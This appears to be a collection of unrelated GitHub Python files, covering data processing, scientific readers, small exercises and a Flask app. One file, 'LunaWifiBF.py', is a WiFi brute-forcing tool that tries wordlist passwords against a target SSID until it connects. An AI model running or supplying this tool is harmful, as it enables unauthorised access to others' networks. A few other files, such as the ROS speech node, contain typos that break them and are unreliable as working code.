(row.split(','))\n\n\n feature_idx[0][0]= 'light'\n feature_idx[0][-1] = 'contemplation'\n print(feature_idx[0])\n feature_idx = feature_idx[0]\n print(len(feature_idx))\n f.close()\n\n counter = 0\n binary_feature = None\n string_features = np.load(string_tag_path,allow_pickle=True)\n for ele in string_features:\n \n binary_row = np.zeros((1,len(feature_idx)))\n for i in ele:\n idx = feature_idx.index(i)\n binary_row[0,idx] = 1\n \n if counter==0:\n binary_feature = binary_row\n\n else:\n\n binary_feature = np.concatenate((binary_feature,binary_row),axis=0)\n\n counter +=1\n print(binary_feature.shape)\n \n np.save(binary_tag_store_path, binary_feature)\n\n\n\ndef move_rename(Root, Dest_path):\n\n # Uncomment to rename all files\n count = 0\n for root, dirs, files in os.walk(Root, topdown=True):\n \n for name 
in files:\n print(os.path.join(root, name))\n curr_name = os.path.join(root, name)\n new_name = os.path.join(root, str(count)+name)\n os.rename(curr_name, new_name)\n count += 1\n\n\n # move all files in subfolders into one folder\n for root, dirs, files in os.walk(Root, topdown=True):\n\n for name in files:\n print(os.path.join(root, name))\n shutil.copyfile(os.path.join(root, name), os.path.join(Dest_path, name))\n\n\n\n","repo_name":"LYM98/545-Final-Project","sub_path":"LYM_All_Code/Final_Version_Data_Processing_Labelme.py","file_name":"Final_Version_Data_Processing_Labelme.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7223029863","text":"import socket\n\ndef main():\n mensaje = \"\"\n print('Cliente 1.0')\n host, port = 'localhost', 8050\n sock = socket.socket()\n sock.connect((host, port))\n while mensaje != 'salir':\n print('Escribe un mensaje o salir para terminar conexion')\n mensaje = input('Usted dice: ')\n sock.send(mensaje.encode())\n sock.close()\n\nmain()\n","repo_name":"Regnier96/EjerciciosPython3_Erick","sub_path":"Ejercicios/E5/ClienteTCP_Mul.py","file_name":"ClienteTCP_Mul.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24268217628","text":"# Python 3.7\n# For the course Stochastic Calculus, Fall semester 2019, Courant Institute, NYU\n# Author: course instructor, Jonathan Goodman\n# https://www.math.nyu.edu/faculty/goodman/teaching/StochCalc2019/StochCalc.html\n\n# filename: IntegrationDemo.py\n# For assignment 1.\n\n# Compute the integral in assignment 1 numerically\n\nimport numpy as np # numerical computing library\n\nprint(\"Python file IntegrationDemo.py\")\nprint(\"Compute an integral\")\n\n# Z = integral from 0 to infinite r^{n-1}e^{-r^2/2} dr\n\nn = 4 # dimension of the space\nrMax = 10. + n # integrate to rMax instead of infinity.\n # write 10. instead of 10 so it will be floating point\nnPts = 1000 + 10*n*n # number of points for integration, use a lot\ndr = rMax/(nPts-1) # width of an integration cell.\n # it's (nPts-1) because if nPts = 3 then there are 2 cells\n\nsum = 0.\nfor r in ( np.linspace(0, rMax, nPts)):\n sum += np.power(r,(n-1))*np.exp(-r*r/2)\nZ = dr*sum\n\noutput = \"integral for n = {0:3d} is Z = {1:12.6e}\".format(n, Z)\nprint(output)\n","repo_name":"yifanlee1128/PythonProject_Coursework_StoCal","sub_path":"assignment1/IntegrationDemo.py","file_name":"IntegrationDemo.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13041960013","text":"import re\nfrom os.path import basename\n\nfrom astropy.table import join\n\nfrom ...io.registry import (register_reader, register_identifier)\nfrom ...io.ligolw import is_ligolw\nfrom .ligolw import read_table\nfrom .. 
import EventTable\nfrom .pycbc import get_mchirp\n\n__author__ = 'Derk Davis '\n__credits__ = 'Patrick Godwin '\n\nGSTLAL_FORMAT = 'ligolw.gstlal'\nGSTLAL_SNGL_FORMAT = 'ligolw.gstlal.sngl'\nGSTLAL_COINC_FORMAT = 'ligolw.gstlal.coinc'\n\nGSTLAL_FILENAME = re.compile('([A-Z][0-9])+-LLOID-[0-9.]+-[0-9.]+.xml.gz')\n\n\n# singles format\ndef read_gstlal_sngl(source, **kwargs):\n \"\"\"Read a `sngl_inspiral` table from one or more GstLAL LIGO_LW XML files\n\n source : `file`, `str`, :class:`~ligo.lw.ligolw.Document`, `list`\n one or more open files, file paths, or LIGO_LW `Document` objects\n\n **kwargs\n keyword arguments for the read, or conversion functions\n\n See also\n --------\n gwpy.io.ligolw.read_table\n for details of keyword arguments for the read operation\n gwpy.table.io.ligolw.to_astropy_table\n for details of keyword arguments for the conversion operation\n \"\"\"\n from ligo.lw import lsctables\n extra_cols = []\n derived_cols = []\n val_col = lsctables.TableByName['sngl_inspiral'].validcolumns\n if 'columns' in kwargs:\n for name in kwargs['columns'].copy():\n if name in GET_COLUMN:\n derived_cols.append(name)\n kwargs['columns'].remove(name)\n required_cols = GET_COLUMN_EXTRA[name]\n missing_cols = [c for c in required_cols\n if c not in kwargs['columns']]\n for r_col in missing_cols:\n kwargs['columns'].append(r_col)\n extra_cols.append(r_col)\n elif name not in val_col:\n name_list = list(val_col.keys())+list(GET_COLUMN.keys())\n raise ValueError(f\"'{name}' is not a valid column name. \"\n f\"Valid column names: {name_list}\")\n events = read_table(source, tablename='sngl_inspiral', **kwargs)\n for col_name in derived_cols:\n col_data = GET_COLUMN[col_name](events)\n events.add_column(col_data, name=col_name)\n for col_name in extra_cols:\n events.remove_column(col_name)\n return events\n\n\n# coinc format\ndef read_gstlal_coinc(source, **kwargs):\n \"\"\"Read a `Table` containing coincident event information\n from one or more GstLAL LIGO_LW XML files\n\n source : `file`, `str`, :class:`~ligo.lw.ligolw.Document`, `list`\n one or more open files, file paths, or LIGO_LW `Document` objects\n\n **kwargs\n keyword arguments for the read, or conversion functions\n\n See also\n --------\n gwpy.io.ligolw.read_table\n for details of keyword arguments for the read operation\n gwpy.table.io.ligolw.to_astropy_table\n for details of keyword arguments for the conversion operation\n \"\"\"\n from ligo.lw import lsctables\n extra_cols = []\n if 'columns' in kwargs:\n columns = kwargs['columns']\n kwargs.pop('columns')\n val_col_inspiral = lsctables.TableByName['coinc_inspiral'].validcolumns\n val_col_event = lsctables.TableByName['coinc_event'].validcolumns\n for name in columns:\n if (name not in val_col_inspiral) and (name not in val_col_event):\n name_list = list(val_col_inspiral.keys()) + \\\n list(val_col_event.keys())\n raise ValueError(f\"'{name}' is not a valid column name. 
\"\n f\"Valid column names: {name_list}\")\n if 'coinc_event_id' not in columns:\n columns.append('coinc_event_id')\n extra_cols.append('coinc_event_id')\n inspiral_cols = [col for col in columns if col in val_col_inspiral]\n event_cols = [col for col in columns if col in val_col_event]\n inspiral_cols.append('coinc_event_id')\n coinc_inspiral = read_table(source, tablename='coinc_inspiral',\n columns=inspiral_cols, **kwargs)\n coinc_event = read_table(source, tablename='coinc_event',\n columns=event_cols, **kwargs)\n else:\n coinc_inspiral = read_table(source, tablename='coinc_inspiral',\n **kwargs)\n coinc_event = read_table(source, tablename='coinc_event', **kwargs)\n events = join(coinc_inspiral, coinc_event, keys=\"coinc_event_id\",\n metadata_conflicts='silent')\n events.meta['tablename'] = 'gstlal_coinc_inspiral'\n for col_name in extra_cols:\n events.remove_column(col_name)\n return events\n\n\n# combined format\ndef read_gstlal(source, triggers='sngl', **kwargs):\n \"\"\"Read a `Table` from one or more GstLAL LIGO_LW XML files\n\n source : `file`, `str`, :class:`~ligo.lw.ligolw.Document`, `list`\n one or more open files, file paths, or LIGO_LW `Document` objects\n\n triggers : `str`, optional\n the `Name` of the relevant `Table` to read, if not given a table will\n be returned if only one exists in the document(s).\n 'sngl' for single-detector trigger information,\n 'coinc' for coincident trigger information\n\n **kwargs\n keyword arguments for the read, or conversion functions\n\n See also\n --------\n gwpy.io.ligolw.read_table\n for details of keyword arguments for the read operation\n gwpy.table.io.ligolw.to_astropy_table\n for details of keyword arguments for the conversion operation\n \"\"\"\n\n if triggers == 'sngl':\n return read_gstlal_sngl(source, **kwargs)\n if triggers == 'coinc':\n return read_gstlal_coinc(source, **kwargs)\n else:\n raise ValueError(\"The 'triggers' argument must be 'sngl' or 'coinc'\")\n\n\ndef identify_gstlal(origin, filepath, fileobj, *args, **kwargs):\n \"\"\"Identify a GstLAL file as a ligolw file with the correct name\n \"\"\"\n if is_ligolw(origin, filepath, fileobj, *args, **kwargs) and (\n filepath is not None\n and GSTLAL_FILENAME.match(basename(filepath))):\n return True\n return False\n\n\n# registers for unified I/O\nregister_identifier(GSTLAL_FORMAT, EventTable, identify_gstlal)\nregister_reader(GSTLAL_SNGL_FORMAT, EventTable, read_gstlal_sngl)\nregister_reader(GSTLAL_COINC_FORMAT, EventTable, read_gstlal_coinc)\nregister_reader(GSTLAL_FORMAT, EventTable, read_gstlal)\n\n# -- processed columns --------------------------------------------------------\n#\n# Here we define methods required to build commonly desired columns that\n# are just a combination of the basic columns.\n#\n# Each method should take in a `~gwpy.table.Table` and return a `numpy.ndarray`\n\nGET_COLUMN = {}\nGET_COLUMN_EXTRA = {}\n\n\ndef get_snr_chi(events, snr_pow=2., chi_pow=2.):\n \"\"\"Calculate the 'SNR chi' column for this GstLAL ligolw table group\n \"\"\"\n snr = events['snr'][:]\n chisq = events['chisq'][:]\n snr_chi = snr**snr_pow / chisq**(chi_pow/2.)\n return snr_chi\n\n\nGET_COLUMN['snr_chi'] = get_snr_chi\nGET_COLUMN_EXTRA['snr_chi'] = ['snr', 'chisq']\n\n\ndef get_chi_snr(events, snr_pow=2., chi_pow=2.):\n \"\"\"Calculate the 'chi SNR' column for this GstLAL ligolw table group,\n reciprocal of the 'SNR chi' column\n \"\"\"\n return 1./get_snr_chi(events, snr_pow, chi_pow)\n\n\nGET_COLUMN['chi_snr'] = get_chi_snr\nGET_COLUMN_EXTRA['chi_snr'] = ['snr', 
'chisq']\n\n# use same function as pycbc\nGET_COLUMN['mchirp'] = get_mchirp\nGET_COLUMN_EXTRA['mchirp'] = ['mass1', 'mass2']\n","repo_name":"gwpy/gwpy","sub_path":"gwpy/table/io/gstlal.py","file_name":"gstlal.py","file_ext":"py","file_size_in_byte":7554,"program_lang":"python","lang":"en","doc_type":"code","stars":358,"dataset":"github-code","pt":"3"} +{"seq_id":"362577677","text":"import pytest\n\nfrom CYLGame.Utils import decrypt_token_list, encrypt_token_list\n\n\n@pytest.mark.parametrize(\"tokens\", [[\"12345678\", \"00000000\"], [\"8E4A1D8\"]])\n@pytest.mark.parametrize(\"key\", [b\"0123456789012345\", b\"=\\x18t\\xdf'\\xff\\xc3\\xde#\\xb8\\n\\x12j:\\x04\\x7f\"])\ndef test_encrypt_decrypt_tokens(tokens, key):\n e_tokens = encrypt_token_list(tokens, key)\n for real_token, decrypted_token in zip(tokens, decrypt_token_list(e_tokens, key)):\n assert real_token == decrypted_token\n","repo_name":"UMDLARS/CYLGame","sub_path":"tests/utils/test_cipher.py","file_name":"test_cipher.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"18479533999","text":"def check_valid_position(rol, cow):\n if 0 <= rol < len(field) and 0 <= cow < len(field):\n return True\n else:\n return False\n\n\ndef new_position(dir):\n rol, col = rover_position[0] + directions[dir][0], rover_position[1] + directions[dir][1]\n\n return rol, col\n\n\ndef move_operation(rol, cow):\n global water_found\n global rover_position\n global concrete_found\n global metal_found\n global broken\n\n if field[rol][cow] == 'R':\n print(f\"Rover got broken at ({rol}, {cow})\")\n broken = True\n\n elif field[rol][cow] in ['M', 'C', 'W']:\n current_deposit = field[rol][cow]\n if current_deposit == \"W\":\n print(f\"Water deposit found at ({rol}, {cow})\")\n water_found += 1\n rover_position = [rol, cow]\n elif current_deposit == \"M\":\n print(f\"Metal deposit found at ({rol}, {cow})\")\n metal_found += 1\n rover_position = [rol, cow]\n elif current_deposit == \"C\":\n print(f\"Concrete deposit found at ({rol}, {cow})\")\n concrete_found += 1\n rover_position = [rol, cow]\n field[rol][cow] = '-'\n else:\n rover_position = [rol, cow]\n\n\ndef traverse_field(rol, cow, dir):\n global rover_position\n if dir == \"left\":\n rover_position = [rol, 5]\n elif dir == 'right':\n rover_position = [rol, 0]\n elif dir == 'up':\n rover_position = [5, cow]\n elif dir == 'down':\n rover_position = [0, cow]\n\n\nfield = []\nrover_position = []\n\ndirections = {\n 'up': [-1, 0],\n 'down': [1, 0],\n 'left': [0, -1],\n 'right': [0, 1]\n}\n\nfor row in range(6):\n row_input = input().split()\n field.append(row_input)\n if \"E\" in row_input:\n rover_position = [row, row_input.index(\"E\")]\n field[rover_position[0]][rover_position[1]] = '-'\n\ncommands = input().split(', ')\n\nwater_found = 0\nmetal_found = 0\nconcrete_found = 0\nbroken = False\n\nfor command in commands:\n new_row, new_col = new_position(command)\n if check_valid_position(new_row, new_col):\n move_operation(new_row, new_col)\n else:\n traverse_field(new_row, new_col, command)\n move_operation(rover_position[0], rover_position[1])\n if broken:\n break\n\nif water_found > 0 and metal_found > 0 and concrete_found > 0:\n print(\"Area suitable to start the colony.\")\nelse:\n print(\"Area not suitable to start the colony.\")\n\n","repo_name":"RadoslavTs/SoftUni-Courses","sub_path":"3. Python Advanced/Exams Practice/Retake Exam 14 APR 2022/02. martian_explorer.py","file_name":"02. 
martian_explorer.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71716629523","text":"# encode = utf-8\r\n\r\nimport pyttsx3\r\nimport rospy\r\nfrom std_msgs.msg import String\r\n\r\nclass TTS():\r\n\r\n def audio_output(self,msg):\r\n engine = pyttsx3.init()\r\n engine.say(msg.string)\r\n engine.runAndWait()\r\n\r\n def __init__(self):\r\n rospy.init_node('TTS',anonymous=False)\r\n self.set = rospy.Subscriber('cam_speak',Stirng, self.audio_output)\r\n self.set2 = rsopy.SUbscriber()\r\n\r\nif __name__ == '__main__':\r\n whatever = TTS()","repo_name":"HaoYejia/Give-the-Blind-an-Elephant-in-the-Room","sub_path":"Scripts/temp/ws/src/temp/src/TTS.py","file_name":"TTS.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7037253241","text":"\nfrom OpenGL.GL import *\nfrom ctypes import c_float, c_ushort\n\nclass Mesh:\n def __init__(self, vertices, normals=None, indices=None):\n self.varray = glGenVertexArrays(1)\n\n glBindVertexArray(self.varray)\n\n self.vertices = glGenBuffers(1)\n nativeVertices = (c_float * len(vertices))(*vertices)\n\n glBindBuffer(GL_ARRAY_BUFFER, self.vertices)\n glBufferData(GL_ARRAY_BUFFER, nativeVertices, GL_STATIC_DRAW)\n\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, None)\n\n del nativeVertices\n\n if normals:\n self.normals = glGenBuffers(1)\n nativeNormals = (c_float * len(normals))(*normals)\n\n glBindBuffer(GL_ARRAY_BUFFER, self.normals)\n glBufferData(GL_ARRAY_BUFFER, nativeNormals, GL_STATIC_DRAW)\n\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 3, GL_FLOAT, GL_FALSE, 0, None)\n\n del nativeNormals\n\n if indices:\n self.indices = glGenBuffers(1)\n\n nativeIndices = (c_ushort *len(indices))(*indices)\n\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.indices)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, nativeIndices, GL_STATIC_DRAW)\n\n del nativeIndices\n\n glBindVertexArray(0)\n\n if indices:\n self.count = len(indices)\n else:\n self.count = len(vertices)/3\n\n def draw(self, type=GL_TRIANGLES):\n glBindVertexArray(self.varray)\n\n if hasattr(self, 'indices'):\n glDrawElements(type, self.count, GL_UNSIGNED_SHORT, None)\n else:\n glDrawArrays(type, 0, self.count)\n\n glBindVertexArray(0)\n\n","repo_name":"swiftcoder/aurae","sub_path":"mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"8991664672","text":"# Author: RT\n# Date: 2022-12-17T12:41:36.507Z\n# URL: https://leetcode.com/problems/evaluate-reverse-polish-notation/\n\n\nfrom operator import add, mul, sub\n\n\nclass Solution:\n def evalRPN(self, tokens: list[str]) -> int:\n def div(a, b):\n return int(a / b)\n\n op_map = {\n \"+\": add,\n \"-\": sub,\n \"*\": mul,\n \"/\": div,\n }\n stack = []\n for token in tokens:\n if token in op_map:\n b = stack.pop()\n a = stack.pop()\n stack.append(op_map[token](a, b))\n else:\n stack.append(int(token))\n\n return stack.pop()\n","repo_name":"Roytangrb/dsa","sub_path":"leetcode/python/150-evaluate-reverse-polish-notation.py","file_name":"150-evaluate-reverse-polish-notation.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"17024133795","text":"import termcolor2\nimport 
colorama\ncolorama.init()\n\n\n\n\nmyText = '''\n\n██░▀██████████████▀░██ \n█▌▒▒░████████████░▒▒▐█ # # # # ## Luɲɑ\n█░▒▒▒░██████████░▒▒▒░█ # # # ## # # #\n▌░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░▐ # # # # # ####\n░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░ # # # # # # #\n███▀▀▀██▄▒▒▒▒▒▒▒▄██▀▀▀██ #### ## # # # #\n██░░░▐█░▀█▒▒▒▒▒█▀░█▌░░░█ # \n▐▌░░░▐▄▌░▐▌▒▒▒▐▌░▐▄▌░░▐▌ ##\n█░░░▐█▌░░▌▒▒▒▐░░▐█▌░░█ \n▒▀▄▄▄█▄▄▄▌░▄░▐▄▄▄█▄▄▀▒ Wɪғɪ ʙʀᴜᴛᴇғᴏʀᴄɪɴɢ \n░░░░░░░░░░└┴┘░░░░░░░░░ \n██▄▄░░░░░░░░░░░░░░▄▄██ \n████████▒▒▒▒▒▒████████ \n█▀░░███▒▒░░▒░░▒▀██████\n█▒░███▒▒╖░░╥░░╓▒▐█████\n█▒░▀▀▀░░║░░║░░║░░█████\n██▄▄▄▄▀▀┴┴╚╧╧╝╧╧╝┴┴███\n██████████████████████\n'''\n\n# a definiir com com paloma \nprint(termcolor2.colored(myText, 'yellow'))\n\n\nimport pywifi\nimport time\nfrom pywifi import const\n\nwifi = pywifi.PyWiFi()\n\niface = wifi.interfaces()[0]\n\nif iface.status() == const.IFACE_CONNECTED:\n print('=> There is already a network connected')\n choose = input('''=> Disconnect and continue or give up?\n (type disk to disconnect or gu for give up)\\n''')\n if choose == 'disconnect':\n iface.disconnect()\n print('=> disconnected')\n time.sleep(2)\n elif choose == 'gu':\n print('=> okay, bye')\n time.sleep(2)\n exit()\n\n\nassert iface.status() in\\\n [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]\n\nprofile = pywifi.Profile()\nssid = input('{+} SSID: ')\nprofile.ssid = ssid\nprofile.auth = const.AUTH_ALG_OPEN\nprofile.akm.append(const.AKM_TYPE_WPA2PSK)\nprofile.cipher = const.CIPHER_TYPE_CCMP\n\nssid = input('{+} wordlist(.txt): ')\nf = open(ssid,'r')\narq = f.readlines()\nlines = len(arq)\n\n\ni=0\nfor tentativa in arq:\n lista = tentativa.rstrip('\\n')\n print('Attemp',i,':',lista)\n i+=1\n profile.key = lista\n iface.remove_all_network_profiles()\n tmp_profile = iface.add_network_profile(profile)\n iface.connect(tmp_profile)\n time.sleep(5)\n if iface.status() == const.IFACE_CONNECTED:\n print('connected')\n print('''\n have a nice day :3\n ''')\n #iface.disconnect()\n time.sleep(1)\n exit()\nf.close()\n\n\n\n\n","repo_name":"Shokitex/Luna_WifiBF","sub_path":"LunaWifiBF.py","file_name":"LunaWifiBF.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23924309122","text":"#STUDENTS: Jason Pettit, Marcus Gonzalez\n#CST205-40_SP19\n#Module 7 Lab 16\n\nimport urllib\nimport os\n\ndef htmlScrape(site,openTag,closeTag):\n \"\"\"Take 3 arguments:website, opening html tag and closing html tag. 
\n Creates new webpage, data.html, with provided tags.\n \"\"\"\n os.chdir(setMediaPath())\n file=open(\"data.html\",\"w\")\n article=False\n data=urllib.urlopen(site)\n for line in data.readlines():\n if openTag in line:\n article = True\n if article:\n file.write(line)\n if closeTag in line:\n article = False\n file.close()\n \nhtmlScrape(\"https://www.ign.com/\",\"\")\n","repo_name":"Pentagration/Lab16_JM","sub_path":"lab16.py","file_name":"lab16.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26633069180","text":"from flask import Flask\nfrom flask_socketio import SocketIO\nfrom data_marketplace.utils.dlt import connect_iota\n\napp = Flask(__name__, \\\n instance_relative_config=True)\napp.config.from_object('config.default')\napp.config.from_pyfile('config.py')\nsocketio = SocketIO(app, ping_timeout=app.config['PING_TIMEOUT'],\n max_http_buffer_size=app.config['MAX_SEND_SIZE'])\napp.iota = connect_iota(app.config['IOTA_NODE'],\n app.config['IOTA_SEED'])\n","repo_name":"grandq33769/gdpr-data-marketplace","sub_path":"data_marketplace/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22575615911","text":"import argparse\nfrom collections import namedtuple\n\nparser = argparse.ArgumentParser()\nparser.add_argument('filename', type=str,\n help='input file')\n\nargs = parser.parse_args()\n\nItem = namedtuple('Item', ['value', 'weight'])\n\ndef read_file(filename):\n items = []\n\n with open(filename, 'r') as f:\n for line_num, line in enumerate(f):\n if line_num == 0:\n capacity, num_items = map(int, line.strip().split(' '))\n continue\n value, weight = map(int, line.strip().split(' '))\n item = Item(value, weight)\n items.append(item)\n \n return capacity, num_items, items\n\ndef solve_knapsack_dynamic(capacity, items):\n num_items = len(items)\n\n sol_arr = [[0] * (num_items + 1) for _ in range(capacity + 1)]\n\n for item_num, item in enumerate(items, 1):\n if item_num % 10 == 0:\n print(item_num)\n for cap in range(1, capacity + 1):\n item_less_val = sol_arr[cap][item_num - 1]\n if cap - item.weight < 0:\n sol_arr[cap][item_num] = item_less_val\n else: \n include_item_val = sol_arr[cap - item.weight][item_num - 1] + item.value\n sol_arr[cap][item_num] = max(item_less_val, include_item_val)\n\n\n return sol_arr\n\ndef main():\n filename = args.filename\n capacity, num_items, items = read_file(filename)\n print(capacity, num_items)\n sol = solve_knapsack_dynamic(capacity, items)\n #for line in sol:\n # print(line)\n print(sol[capacity][num_items])\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Inevitable-Marzipan/algo_design","sub_path":"problem 9/dynamic_knapsack.py","file_name":"dynamic_knapsack.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"911023036","text":"from __future__ import absolute_import, print_function\nimport os\nimport pandas as pd\nimport numpy as np\n\nfrom .BaseStructProtocol import BaseStructProtocol\nfrom codifyComplexes.CodifyComplexException import CodifyComplexException\nfrom computeFeatures.seqStep.seqToolManager import SeqToolManager\nAA_CODE_ELEMENTS= SeqToolManager.AA_CODE_ELEMENTS\n'''\n(feature_name, path_to_dir, columns ). 
If columns==None, all columns will be used\nStructural features must come first as sequential single chains features muy contain more aminoacids\n(e.g. non 3D-solved residues)\n'''\nFEATURES_TO_INCLUDE_CHAIN= [\n (\"psaia\", (\"structStep/PSAIA/procPSAIA\", None)),\n (\"halfSphereExpos\", (\"structStep/halfSphereExpos\", None)),\n (\"dssp\", (\"structStep/DSSP\", [3])),\n (\"al2co\", (\"seqStep/conservation/al2co\",None)),\n (\"winPssms\", (\"seqStep/conservation/pssms/windowedPSSMs/wSize11\", None)),\n (\"winSeq\", (\"seqStep/slidingWinSeq11\", None))\n]\nFEATURES_TO_INCLUDE_PAIR= [\n (\"corrMut\", (\"seqStep/conservation/corrMut\", None)),\n]\n\nclass StructProtocol(BaseStructProtocol):\n '''\n This class implements structural voronoi environment codification\n '''\n def __init__(self, dataRootPath, cMapPath, prevStepPaths=None, singleChainfeatsToInclude= FEATURES_TO_INCLUDE_CHAIN, \n pairfeatsToInclude=FEATURES_TO_INCLUDE_PAIR, verbose=False):\n '''\n :param dataRootPath: str. A path to computedFeatures directory that contains needed features. Example:\n computedFeatures/\n common/\n contactMaps/\n seqStep/\n conservation/\n ...\n structStep/\n PSAIA/\n VORONOI/\n ... \n \n :param cMapPath: str. A path to a dir that contains the contact map of the protein complex\n\n :param prevStepPaths: str or str[]. A path to previous results files directory. If it is None, contactMaps files will be used\n to define which residue pairs are in contact. Can also be a str[] if multiple feedback_path's\n wanted\n '''\n BaseStructProtocol.__init__(self, dataRootPath, cMapPath, prevStepPaths,\n singleChainfeatsToInclude=FEATURES_TO_INCLUDE_CHAIN, \n pairfeatsToInclude= FEATURES_TO_INCLUDE_PAIR, verbose= verbose)\n\n def loadSingleChainFeatures(self, prefixOneChainType, chainType):\n '''\n @overrides BaseStructProtocol method to make use of sequence profiles (loaded directly) and struct\n neighbour but not computing struct neighbours on non central residue features of sliding window\n Loads all features files computed for ligand or receptor chains. Returns a pandas.DataFrame \n that contains in each row all features from all files for each amino acid. Just amino acids\n that appears in each file will be included. Others will be ruled out (intersection)\n :param prefixOneChainType: str. A prefixOneChainType that identifies the receptor or ligand\n :param chainType: str. \"l\" for ligand and \"r\" for receptor\n :return df: pandas.DataFrame. 
A pandas.Dataframe in which each row represents\n one amino acid\n Column names are:\n 'chainId%s', 'resId%s', 'resName%s', [properties] #no defined order for properties\n %s is L if chainType==\"l\" and R if chainType==\"r\"\n '''\n #super (BaseStructProtocol,self) is AbstractProtocol\n singleChainFeats= super(BaseStructProtocol,self).loadSingleChainFeatures( prefixOneChainType, chainType) #Load with no aggregation\n\n chainType= chainType.upper()\n winSize= max([ int(elem.split(\".\")[-1][:-1]) for elem in singleChainFeats.columns if elem.startswith(\"pssmWin\") ])+1\n centralRes= winSize//2\n #find variables that will not be considered for structural aggreation: sliding window features of non central amino acids\n \n selectedSeqEntr= set([ 'informationWin.%d.%d%s'%(i, centralRes, chainType) for i in range(2)])\n selectedPssm= set([ 'pssmWin.%d.%d%s'%(i, centralRes, chainType) for i in range(20)])\n selectedPsfm= set([ 'psfmWin.%d.%d%s'%(i, centralRes, chainType) for i in range(20)])\n selectedWinAA= set([ 'aaWin.0.%d_dummy_%s%s'%(centralRes,letter, chainType) for letter in AA_CODE_ELEMENTS ])\n\n #this variables will be aggregated\n centralResCols= selectedSeqEntr.union(selectedPssm).union(selectedPsfm).union(selectedWinAA)\n\n winCols= set([col for col in singleChainFeats.columns if not \"ggr\" in col and \"Win\" in col ])\n #this variables will not be aggreaged\n allWinButCentralCols= winCols.difference(centralResCols)\n \n allButWinData= singleChainFeats[ [col for col in singleChainFeats.columns if not col in allWinButCentralCols] ]\n winData= singleChainFeats[ list(singleChainFeats.columns[:3])+[col for col in singleChainFeats.columns if col in allWinButCentralCols] ]\n# print( list( allButWinData.columns) );raw_input(\"enter\")\n singleChainFeats= self.addSingleChainAggregation(allButWinData, chainType)\n mergeOn= [ elem%chainType.upper() for elem in [\"chainId%s\", \"resId%s\", \"resName%s\"] ]\n singleChainFeats= pd.merge(singleChainFeats, winData, how='inner', on=mergeOn) \n return singleChainFeats\n\n\n# uncomment to use product terms\n# def addProductTerms(self, df):\n\n# winSize= max([ int(elem.split(\".\")[-1][:-1]) for elem in df.columns if elem.startswith(\"pssmWin\") ])+1\n# centralRes= winSize//2\n\n# selectedColsL= sorted(['pssmWin.%d.%d%s'%(i, centralRes, \"L\") for i in range(20)] +\n# [ 'total_RASAL', 'average_DPXL', 'HydrophobicityL'])\n# selectedColsR= sorted(['pssmWin.%d.%d%s'%(i, centralRes, \"R\") for i in range(20)] +\n# [ 'total_RASAR', 'average_DPXR', 'HydrophobicityR'])\n# print(selectedColsL)\n# for colL in selectedColsL:\n# for colR in selectedColsR:\n# df[ colL+colR+\"_P\"]= df[colL]*df[colR]\n# return df\n\n# def applyProtocol( self, prefixComplex, prefixL, prefixR):\n# '''\n# This method is the basic skeleton for applyProtocol of subclasses\n# Given a prefix that identifies the complex and prefixes that identifies\n# the ligand and the receptor, this method integrates the information that\n# is contained in self.dataRootPath and is described in self.singleChainfeatsToInclude\n# \n# :param prefixComplex: str. A prefix that identifies a complex\n# :param prefixL: str. A prefix that identifies the ligand of the complex\n# :param prefixR: str. A prefix that identifies the receptor of the complex\n# :return df: pandas.DataFrame. A pandas.Dataframe in which each row represents\n# a pair of amino acids in direct form (L to R).\n# Column names are:\n# 'chainIdL', 'resIdL', 'resNameL', 'chainIdR', 'resIdR', 'resNameR', 'categ'\n# [ propertiesL .... 
